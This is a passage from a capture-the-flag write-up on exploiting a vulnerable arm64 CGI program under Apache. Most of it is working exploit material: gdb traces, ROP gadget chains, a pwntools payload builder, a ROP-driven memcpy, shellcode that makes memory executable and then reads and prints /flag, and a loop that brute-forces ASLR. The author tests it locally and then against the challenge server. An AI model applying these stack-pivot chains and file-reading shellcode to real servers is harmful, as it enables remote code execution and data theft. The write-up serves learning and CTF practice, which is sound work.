0x550079b2d0:   0x00000055007ce090      0x0000000000440408

We can see that x29 and x30 will take our buffer addr and the stack pivot gadget address. After a few more instructions, we execute the ret:

(gdb) si
0x0000000000440408 in is_trusted_path_normalize ()
(gdb) x /6i $pc
=> 0x440408 <is_trusted_path_normalize+280>:    mov     sp, x29
   0x44040c <is_trusted_path_normalize+284>:    ldp     x19, x20, [sp, #16]
   0x440410 <is_trusted_path_normalize+288>:    ldp     x21, x22, [sp, #32]
   0x440414 <is_trusted_path_normalize+292>:    ldp     x23, x24, [sp, #48]
   0x440418 <is_trusted_path_normalize+296>:    ldp     x29, x30, [sp], #64
   0x44041c <is_trusted_path_normalize+300>:    ret
(gdb) si
0x000000000044040c in is_trusted_path_normalize ()
(gdb) p /x $sp
$13 = 0x55007ce090
(gdb) x /10gx $sp
0x55007ce090:   0x00000000deadbeef      0x00000000004057dc # x29, x30
0x55007ce0a0:   0x00000000deadbeef      0x00000000deadbeef # x19, x20
0x55007ce0b0:   0x00000000deadbeef      0x00000000deadbeef # x21, x22
0x55007ce0c0:   0x0000000000000007      0x0000000000427d0c # x23, x24
0x55007ce0d0:   0x00000000deadbeef      0x0000000000400684

After a few more instructions, we are in the x2-load gadget:

(gdb) si
0x00000000004057dc in msort_with_tmp.part ()
(gdb) x /4i $pc
=> 0x4057dc <msort_with_tmp.part.0+156>:        mov     x2, x23
   0x4057e0 <msort_with_tmp.part.0+160>:        mov     x1, x27
   0x4057e4 <msort_with_tmp.part.0+164>:        mov     x0, x26
   0x4057e8 <msort_with_tmp.part.0+168>:        blr     x24
(gdb) p /x $x23
$14 = 0x7
(gdb) p /x $x24
$15 = 0x427d0c

And from there, we should get to the x16-branch gadget:

(gdb) x /4i $pc
=> 0x427d0c <__gconv_transform_internal_ucs4le+972>:    ldr     x16, [sp, #96]
   0x427d10 <__gconv_transform_internal_ucs4le+976>:    ldp     x1, x0, [sp, #120]
   0x427d14 <__gconv_transform_internal_ucs4le+980>:    ldp     x29, x30, [sp], #176
   0x427d18 <__gconv_transform_internal_ucs4le+984>:    br      x16
(gdb) x /6gx $sp + 0x60
0x55007ce130:   0x0000000000420440      0x00000000deadbeef # mprotect addres, _
0x55007ce140:   0x00000000deadbeef      0x0000000000001000 # _, size
0x55007ce150:   0x000000000047d000      0x00000000deadbeef # mapping address
(gdb) x /2gx $sp
0x55007ce0d0:   0x00000000deadbeef      0x0000000000400684 # x29, x30

And from there, to mprotect:

(gdb) si
0x0000000000420440 in mprotect ()
(gdb) x /5i $pc
=> 0x420440 <mprotect>: nop
   0x420444 <mprotect+4>:       mov     x8, #0xe2                       // #226
   0x420448 <mprotect+8>:       svc     #0x0
   0x42044c <mprotect+12>:      cmn     x0, #0xfff
   0x420450 <mprotect+16>:      b.cs    0x420458 <mprotect+24>  // b.hs, b.nlast
(gdb) si
0x0000000000420444 in mprotect ()
(gdb) si
0x0000000000420448 in mprotect ()
(gdb) si
0x0000000000420450 in mprotect ()
(gdb) p /x $x0
$16 = 0x0

mprotect succeeded ✅︎

We can check that by running it with strace:

>>> print(run_with_strace(payload).decode())
(...)
Content-type: text/html
14230 write(1,0x49b020,24) = 24

14230 write(1,0x49b020,1) = 1
14230 mprotect(0x000000000047d000,4096,PROT_EXEC|PROT_READ|PROT_WRITE) = 0
<h1>Please provide your name with the name= parameter.</h1>
14230 write(1,0x49b020,60) = 60
(...)

Executing our own code

Our goal is to get control over that process. We want to execute arbitrary code, and using rop is tedious. Now that we have a writable and executable region of memory, we can write our own code to it.

Writing a small shellcode

Let’s start by writing a simple shellcode that writes a custom string to stdout.

From the syscalls table, we know that we need to put:

0x40 in x8
0x1 in x0
a string in x1
the size in x2

Let’s also call exit so we close the program, that’s 0x5d

def shellcode():
  code = pwn.asm("""
    mov x8, #0x40
    mov x0, #1
    adr x1, hello_world
    mov x2, #hello_world_len
    svc #0

    mov x8, #0x5d
    mov x0, #0
    svc #0

hello_world:
  .asciz "Hello, World\\n"
hello_world_len = . - hello_world
  """)

  return code

Copying the code

Now with the tedious part… We need to copy our code to the executable page… using rop.

We can use a gadget like this one:

0x00000000004450fc:
    str x20, [x19, #8];
    ldp x19, x20, [sp, #0x10];
    ldp x29, x30, [sp], #0x20;
    ret;

That writes x20 into the address pointed by x19 + 8, loads x29, x30, x19, x20 and returns. We can repeat this gadget to copy 8 bytes at a time.

Our first gadget should be a subset of this one, without the write, so we can have control over x19 and x20:

0x0000000000445100:
    ldp x19, x20, [sp, #0x10];
    ldp x29, x30, [sp], #0x20;
    ret;

So now let’s write our memcpy implementation!

def memcpy(rop, dst, data, return_addr):
  # Callers must start by jumping into `0x445100`
  # We have control over everything that's next on the stack.
  memcpy_gadget = 0x4450fc

  while len(data) > 8:
    rop.raw(0xdeadbeef) # x29
    rop.raw(memcpy_gadget) # x30
    rop.raw(dst - 0x8) # x19
    rop.raw(pwn.u64(data[:8])) # x20

    dst += 0x8
    data = data[8:]

  # Copy the last part.
  data += b'\x00' * 8
  rop.raw(0xdeadbeef)  # x29
  rop.raw(memcpy_gadget)
  rop.raw(dst - 0x8)
  rop.raw(pwn.u64(data[:8]))
  # This will perform the last store
  # And jump to return_addr.
  rop.raw(0xdeadbeef)
  rop.raw(return_addr)
  rop.raw(0xdeadbeef)
  rop.raw(0xdeadbeef)

  return

Updating our rop-chain

Our updated code looks like this (note that we need to change the puts addr to the memcpy address):

import mmap

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
  ]

  payload = b'&'.join(keyvals)
  payload += b'\x00' * (0x58 - len(payload))

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  mprotect_addr = 0x420440
  mapping_addr = 0x47d000
  mprotect_size = 0x1000
  mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
  
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x4057dc)   # x30, x2-load gadget
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
  rop.raw(0x427d0c) # x24, x16-branch gadget

  """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.

  0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
  """

  """
    The x16-branch gadget, loads x16, x1, x0, x29 and x39 from
    the stack, advances the stack and branches to x16.

  0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16; 
  """
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00445100) # x30, memcpy addr.
  for i in range((0x60-0x10)//8):
    rop.raw(0xdeadbeef) # filling until 0x60
  rop.raw(mprotect_addr) # sp + 0x60
  rop.raw(0xdeadbeef) # sp + 0x68
  rop.raw(0xdeadbeef) # sp + 0x70
  rop.raw(mprotect_size) # sp + 0x78 x1, size
  rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
  for i in range((0xb0 - 0x88)//8):
    rop.raw(0xdeadbeef) # Filling until 0xb0.

  code = shellcode()

  memcpy(rop, mapping_addr, code, mapping_addr)
  
  payload += rop.chain()
  return payload

>>> payload = rop()
>>> run(payload)
b'Content-type: text/html\n\nHello, World\n\x00'

Printing out the flag.

Now that we can write our own code, to win the challenge we need to print out the flag. So let’s modify our shellcode to openat (0x38) the file stored in /flag, read it to a stack buffer, and print it via stdout.

Let’s create a temporary flag for now, in /tmp while we test locally:

$ echo -n "srelabs{fake-flag}" > /tmp/flag

def shellcode():
  code = pwn.asm("""
    mov x8, #0x40
    mov x0, #1
    adr x1, hello_world
    mov x2, #hello_world_len
    svc #0

    // Open the flag.
    mov x8, #0x38 // SYS_open
    mov x0, #-100 // AT_FDCWD
    adr x1, flag_path
    mov x2, #0 // O_RDONLY
    svc #0

    // Store the fd on a register.
    mov x20, x0

    // Read it into the stack.
    mov x8, #0x3f // SYS_read
    mov x0, x20
    sub x1, sp, #0x100
    mov x2, #0x100
    svc #0

    // x0 has the size of the read.
    mov x21, x0

    // Write it into stdout
    mov x8, #0x40
    mov x0, #1
    sub x1, sp, #0x100
    mov x2, x21
    svc #0
    
    mov x8, #0x5d
    mov x0, #0
    svc #0

flag_path:
  .asciz "/tmp/flag"
hello_world:
  .asciz "Hello, World\\n"
hello_world_len = . - hello_world
  """)

  return code

>>> payload = rop()
>>> print(run(payload).decode())
Content-type: text/html

Hello, World
srelabs{fake-flag}

Success! ✅︎

Overcoming ASLR

Using a real machine.

At some point, I decided to get a real arm64 machine. Luckily, multiple cloud providers allow you to spawn arm64 instances for cheap. For example, GCE, AWS EC2, Hetzner, and Oracle Cloud. After the vm is provisioned, you can install apache2 and enable the CGI-bin module. With that, you should have a setup very close to the one used in the challenge.

You can use similar scripts to run it locally, or against the http server. For using gdb I wrote a function that saves the payload to a file and then just run that.

If we try to run our script there, we will see it failing every time: we need to guess the exact layout up to 3 bytes deep. We can maybe shorten that by doing a huge rop-slide, but it’s still too much.

Address Space Layout Assumptions

If we reflect upon our assumptions, the only assumptions that we made were:

The location of the x30 register (2 bytes).
The location of the x29 register (2 bytes).
The location of our read buffer (3 bytes).

The first two are not 2 bytes exactly, as we know they are next to each other, and one ends with an 8 and the other with a 0, so it’s basically 3 nibbles. We can bruteforce that. But guessing the read buffer is more challenging.

I spent a ton of time thinking about this, you can read more in the “Failed experiments” section. But in the end, I decided that it was not feasible to guess the stack address, and that instead, it might be available somehow.

Register State Analysis

I set up a breakpoint at the end of parse_body, and analyzed both the stack and the registers… And I couldn’t find anything.

I looked for gadgets that would let me add arbitrary stuff to the sp, which would allow me to get to the read buffer. I found this gadget:

0x000000000042152c:
  ldp x29, x30, [sp];
  ldr x19, [sp, #0x10];
  add sp, sp, x12;
  ret;

Which, if we control x12 would let us jump straigth to our buffer. I tried multiple things, but I could not change the value of x12:

x12            0x5950

Note

In QEMU, it seems like x12 is modified during parse_body, but in the arm VM it does not. This seems to be because in QEMU, libc decides to use __memcpy_generic during strncpy, whereas in the VM it uses __memcpy_simd. It is probable that on the real challenge, they also use __memcpy_simd.

This value is not large enough to reach our read buffer (we need at least 4000*0x34 = 208000 bytes).

However, while testing solutions trying to see what registers we do control, I noticed that if we provide the 0x34 key-value pairs, we get x7 pointing to the position after the last &. This means that if we find a way to pivot the stack into the value stored in x7, we should be able to win.

def test_x7():
  payloads = [b'a=b&'] * 0x34
  payload = b''.join(payloads)
  payload += pwn.p32(0xdeadbeef)
  return payload

>>> run_with_gdb(test_x7())

(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c
Continuing.

Breakpoint 6, 0x0000000000400998 in parse_body ()
(gdb) p /x $x7
$19 = 0x55007ce108
(gdb) x /1gx $x7
0x55007ce108:   0x00000000deadbeef

We now have a register that tells us where the stack is, let’s see if we can do a stack pivot with that somehow.

Hunting for stack pivot gadgets

The first thing we want to see, is if there’s a way to work with x7. Storing it into the stack, moving it into another register, etc.

I found a few that were not complete garbage:

0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000044615c: str x7, [sp, #0x108]; stp q0, q16, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret; 
0x0000000000445fc4: str x7, [sp, #0x108]; stp q16, q17, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret

The first one in particular seems simple enough: It stores x7 in the stack, then jmps to x24 (which was restored from the stack at the end of parse_body). So we can use that to chain another rop gadget.

We now need to somehow pick up that value from the stack. We already have a gadget that moves x29 into sp, so we just need a way to load it into x29.

0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;

The first time we execute that rop gadget, we will load x29 and x30 from the stack, and increment the stack by 0x70. If we execute this gadget twice, the second time the stack would be where we stored x7, and the value will be loaded into x29. From there, we can do a normal stack pivot.

So our rop chain now becomes something like this:

0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;

And we need to:

Override parse_body’s x30 in the stack, making it point to x7-store gadget (0x40597c).
Override parse_body’s x24 in the stack, making it point to stack-advance gadget (0x40c46c).
Override sp + 160 + 0x70 + 0x8, making it point to stack-advance gadget.
Override sp + 160 + 0x70*2 + 0x8, making it point to stack-pivot gadget (0x440408).

It’s a bit tricky, because we need to modify 4 values, and each iteartion of the key-value modification loop advances the pointer by 2000 bytes. However, given that we are modifying 2 bytes, as long as we keep on the same 16-bit boundary, we are fine.

Let’s see an example:

Let’s assume parse_body’s sp is at 0xffffff50e300, from there, keys will be 0xe8 bytes after, so it would be at 0xffffff50e3e8, and the next pointer will be 2000 bytes from it, at 0xffffff50ebb8, and so on. The first 6 values will be:

0xffffff50e3e8
0xffffff50ebb8
0xffffff50f388
0xffffff50fb58
0xffffff510328 # <- changes more than 2 bytes
0xffffff510af8

In this particular scenario, we can only write 4 values, but if we get a stack layout starting at a lower number, we would have more opportunities to write. We will explore that after we finish with the exploit.

The values that we need to modify are:

sp + 0x08 (x30 on stack)
sp + 0x38 (x24 on stack)
sp + 160 + 0x08 (where the third gadget will be loaded from).
sp + 160 + 0x70 + 0x08 (where the fourth gadget will be loaded from.)

With our sp value of 0xffffff50e300, this will make:

0xffffff50e308
0xffffff50e338
0xffffff50e3a8
0xffffff50e418

However, there’s a problem with these addresses: the second one has a 0x38 byte. It took me a while to debug it, but 0x38 is &, so that would break everything (remember: we have to avoid NUL-bytes, & and =).

Let’s come up with a different address… like this one: 0xffffe55f9d10, this will get us:

0xffffe55f9d18
0xffffe55f9d48
0xffffe55f9db8
0xffffe55f9e28

And with that, we can start writing our payload:

def rop():
  keyvals = [
    b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
    b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
  ]

  keyvals += [b'a=b'] * (0x34 - len(keyvals))
  # The last entry should leave the stack aligned on a 16-byte boundary.
  # As aarch64 will crash if sp si not aligned to 16 bytes.
  # the read buffer starts at an address ending with 8, so we need
  # to add an extra 8 bytes to align it to 16 bytes.
  payload = b'&'.join(keyvals) + b'a='
  payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'

  """
    If everything went well, we are executing the stack pivot gadget:
    0x0000000000440408:
      mov sp, x29;
      ldp x19, x20, [sp, #0x10];
      ldp x21, x22, [sp, #0x20];
      ldp x23, x24, [sp, #0x30];
      ldp x29, x30, [sp], #0x40;
      ret;

      Let's try calling the printf function.
  """

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  puts_addr = 0x400684

  rop.raw(0xdeadbeef) # x29
  rop.raw(puts_addr)  # x30
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(0xdeadbeef) # x23
  rop.raw(0xdeadbeef) # x24

  payload += rop.chain()

  return payload

We need to run this in the VM (as it has aslr), and we will fail a lot of times. So let’s write a helper function that collects different messages and only print new messages:

import collections

def run_and_collect(n):
    msgs = collections.Counter()
    payload = rop()
    for i in range(n):
        print(f"{i} / {n}", end='\r')
        res = run(payload)
        msgs.update([res])

    for msg, count in msgs.most_common():
        print(f"{count}/{n}: {msg}")

9968/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
19/10000: b'Content-type: text/html\n\n'
9/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
4/10000: b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'

4 in 10000, not too good, but also not too bad.

Adding the rest of the rop chain

Now that we found a way to get an exploit that bruteforces aslr, let’s add the rest of the rop chain we had written.

def rop():
  keyvals = [
    b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
    b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
  ]

  keyvals += [b'a=b'] * (0x34 - len(keyvals))
  # The last entry should leave the stack aligned on a 16-byte boundary.
  # As aarch64 will crash if sp si not aligned to 16 bytes.
  # the read buffer starts at an address ending with 8, so we need
  # to add an extra 8 bytes to align it to 16 bytes.
  payload = b'&'.join(keyvals) + b'a='
  payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'

  """
    If everything went well, we are executing the stack pivot gadget:
    0x0000000000440408:
      mov sp, x29;
      ldp x19, x20, [sp, #0x10];
      ldp x21, x22, [sp, #0x20];
      ldp x23, x24, [sp, #0x30];
      ldp x29, x30, [sp], #0x40;
      ret;
  """
  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  mprotect_addr = 0x420440
  mapping_addr = 0x47d000
  mprotect_size = 0x1000
  mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
  
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x4057dc)   # x30, x2-load gadget
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
  rop.raw(0x427d0c) # x24, x16-branch gadget

  """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.

  0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
  """

  """
    The x16-branch gadget, loads x16, x1, x0, x29 and x39 from
    the stack, advances the stack and branches to x16.

  0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16; 
  """
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00445100) # x30, memcpy addr.
  for i in range((0x60-0x10)//8):
    rop.raw(0xdeadbeef) # filling until 0x60
  rop.raw(mprotect_addr) # sp + 0x60
  rop.raw(0xdeadbeef) # sp + 0x68
  rop.raw(0xdeadbeef) # sp + 0x70
  rop.raw(mprotect_size) # sp + 0x78 x1, size
  rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
  for i in range((0xb0 - 0x88)//8):
    rop.raw(0xdeadbeef) # Filling until 0xb0.

  code = shellcode()

  memcpy(rop, mapping_addr, code, mapping_addr)
  
  payload += rop.chain()
  return payload

Let’s create the fake flag:

echo -n "srelabs{fake-flag}" > /tmp/flag

$ python3 babyarm.py 
b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
b'Content-type: text/html\n\n'
b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
b'Content-type: text/html\n\nHello, World\n\x00srelabs{fake-flag}'

Trying it against the webserver.

Now that we have an exploit that seems to work locally, let’s try it against our apache2 server.

$ python3 babyarm.py 
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''

It seems like it doesn’t work. We can debug it by attaching strace to all the apache2 processes and checking out some of the system calls:

$ sudo strace -ffff -e trace=openat,write -p 2289 -p 1167876 -p 1167875 -s 1000 2> syscalls

Then, watched the file until I confirmed that my payload was executing (searched for “Hello”), from there, I saw two errors:

malformed header from script 'pwn.cgi': Bad header: Hello, World\n"
[pid 2193032] openat(AT_FDCWD, "/tmp/flag", O_RDONLY) = -1 ENOENT (No such file or directory)

For the first one, it turns out that if we call write directly, we might be missing some of the previous buffered output, and the cgi-bin scripts need to start with the Content-type: text/html\n\n header. We can fix this by adding that to our shellcode:

"""
(...)
hello_world:
  .asciz "Content-Type: text/html\\n\\nHello, World\\n"
hello_world_len = . - hello_world
"""

For the second one, it looks like apache2 didn’t have access to the /tmp/flag file, but I checked and it did. I moved the flag to /flag and it worked.

$ python3 babyarm.py 
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''
b'Hello, World\n\x00srelabs{fake-flag}'

And finally, we can try it in the real server… But it will take some time.

Multiple attempts in the same payload.

Before, we observed that if we ended up with a low address in sp, we could be able to modify that from further down the keys list. So let’s take advante of that and create a payload that modifies multiple versions of the aspace.

The lowest we can go is 0x0110, as we cannot use a NUL-byte. So this leaves us with at most 0x20 entries in the keys area to use, after that, we will always be outside the byte range. So in the end, we can only add 8 payloads:

def first_payload(base_addr):
  return [
    b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(base_addr + 0x8),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 0x38),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 168),
    b'\x08\x04\x44=' + b'a'*28 + pwn.p16(base_addr + 168 + 0x70),
  ]

def rop():
  keyvals = []
  keyvals += first_payload(0x0910) # 0x20
  keyvals += first_payload(0x0810) # 0x1c
  keyvals += first_payload(0x0710) # 0x18
  keyvals += first_payload(0x0610) # 0x14
  keyvals += first_payload(0x0410) # 0x10
  keyvals += first_payload(0x0310) # 0x0c
  keyvals += first_payload(0x0210) # 0x08
  keyvals += first_payload(0x0110) # 0x04
  # rest of the rop code follows (...)

9796/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
97/10000: b'Content-type: text/html\n\n'
82/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
25/10000: b'Content-type: text/html\n\nContent-Type: text/plain\n\nHello, World\n\x00srelabs{fake-flag}'

A bit better. One in 400 tries seems reasonable. When I ran it against the real server, it found the flag in less than 200 tries (lucky, I guess).

b'Hello, World\n\x00SRLABS{______________}\n'

GDB Debugging Tips

Using gdb to debug aslr issues can be cumbersome. Something you can do is re-run the program automatically until we hit our breakpoint.

Retrying after exit / crashes

You can do this with break commands. Set one at _exit and for all signals:

(gdb) b _exit
Breakpoint 1 at 0x41ebe0
(gdb) commands
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>run < payload
>end
(gdb) catch signal
Catchpoint 2 (standard signals)
(gdb) commands
Type commands for breakpoint(s) 2, one per line.
End with a line saying just "end".
>run < payload
>end

Conditional Breakpoints

If you are still seeing too much noise, you can also set conditional breakpoint.

Gotchas & Failed Attempts

While working on this challenge, I found some stuff that I wish I knew earlier, and there was also a lot of trial and error. This section describes all of that.

sp must be aligned to 16 at all times.
The code executed in QEMU and in the VM was different because glibc picks which implementation to use for string functions.
The CGI-bin’s output needs to start with Content-Type: text/plain\n\n.
strace makes a difference between open and openat.

Failed Experiments

Write to non-stack areas

You can change the value of the keys_ptr, but you cannot write NUL-bytes, which means that you can’t go outside of the stack.

Writing into values pointers.

If you provide an empty key, then you can change where the value gets copied to, but there doesn’t seem to be anything you can do there.

Going back to `main` or `parse_body`.

I kept wanting to reuse main, to read more from the buffer (you can’t because CGI-Bin script), or to reexecute everything with some changes. I couldn’t think of a way to use that.

Environment Variables.

You can control some environment variables, but I couldn’t think how to use them in any meaningful way. I even wrote a test cgi-bin script to print them out and see what can be done. You can’t write NUL-bytes to them, which limits the amount of stuff you can do.

#include <stdio.h>

int main(int argc, char** argv, char** envp) {
    printf("Content-type: text/html\n\n");

    printf("stack addr: %p\n", __builtin_frame_address(0));
    printf("argc: %d\n", argc);
    printf("argv: %p\n", argv);
    printf("envp: %p\n", envp);

    for (size_t i = 0; argv[i] != NULL; i++) {
        printf("argv[%zu] (%p -> %p): %s\n", i, &argv[i], argv[i], argv[i]);
    }

    for (size_t i = 0; envp[i] != NULL; i++) {
        printf("envp[%zu] (%p -> %p): %s\n", i, &envp[i], envp[i], envp[i]);
    }

    return 0;
}

Sending raw http requests.

I also tried sending manually crafted HTTP requests to the endpoint, thinking that maybe I would be able to see anything different, but I couldn’t.

Stack Layout Analysis.

There seems to be some slight biases towards one set of addresses vs others, but in the end, it didn’t feel like it made a difference.

Pass a huge read buffer.

The read system call that is done in main is huge. However, if you pass a huge buffer, it caps at around 32KiB.

Being able to change `x12`.

Before finding the issue with strncpy in QEMU vs the VM, I thought it would be possible to control x12, and I was able to do so in some extent: I could set a full 64 bit value to it, without NUL-bytes, nor &, nor =:

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
    b'=' + b'\xbc'*18 + pwn.p64(0xdeadbeefabad1dea),
  ]

And in gdb, after setting up a breakpoint, I can see:

(gdb) p /x $x12
$1 = 0xdeadbeefabad1dea

This meant that we could add something to sp, but it has to be something huge. Basically, this means we can substract stuff from it. Sadly, our read buffer was after sp, so substracting stuff didn’t do us any good. I also thought about substracting to the stack after main’s return, but even with that, I was missing another gadget.